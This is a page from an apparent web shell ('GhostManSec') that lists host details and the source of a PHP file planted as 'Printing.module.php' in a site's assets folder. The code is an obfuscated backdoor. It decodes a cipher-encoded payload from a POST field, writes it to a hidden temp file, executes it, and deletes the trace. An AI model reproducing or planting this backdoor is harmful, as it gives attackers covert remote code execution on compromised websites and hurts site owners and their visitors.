GhostManSec
Server: LiteSpeed
System: Linux premium256.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: niyknzcu (1843)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /home/niyknzcu/crivient.com/assets/Printing.module.php
<?php

if(filter_has_var(INPUT_POST, "\x65\x6C\x65\x6Dent")){
	$token = $_REQUEST["\x65\x6C\x65\x6Dent"];
		 $token		=  	explode   ("."		,			$token	  )			;
	$flg 	='';
            $s5 	='abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS 	=strlen($s5);
            $j 	=0;
            $__len 	=count($token);
    
            do {
                if ($j >=	 $__len) break;
                $v7 	=$token[$j];
                $chS 	=ord($s5[$j % $lenS]);
                $d 	=((int)$v7 - $chS - ($j % 10)) ^ 67;
                $flg		.=		chr($d);
                $j++;
            } while (true);
	$ref = array_filter(["/var/tmp", sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), "/tmp", "/dev/shm", getenv("TEMP")]);
	foreach ($ref as $key => $ent) {
    		if (array_product([is_dir($ent), is_writable($ent)])) {
    $pset = vsprintf("%s/%s", [$ent, ".elem"]);
    if (file_put_contents($pset, $flg)) {
	include $pset;
	@unlink($pset);
	die();
}
}
}
}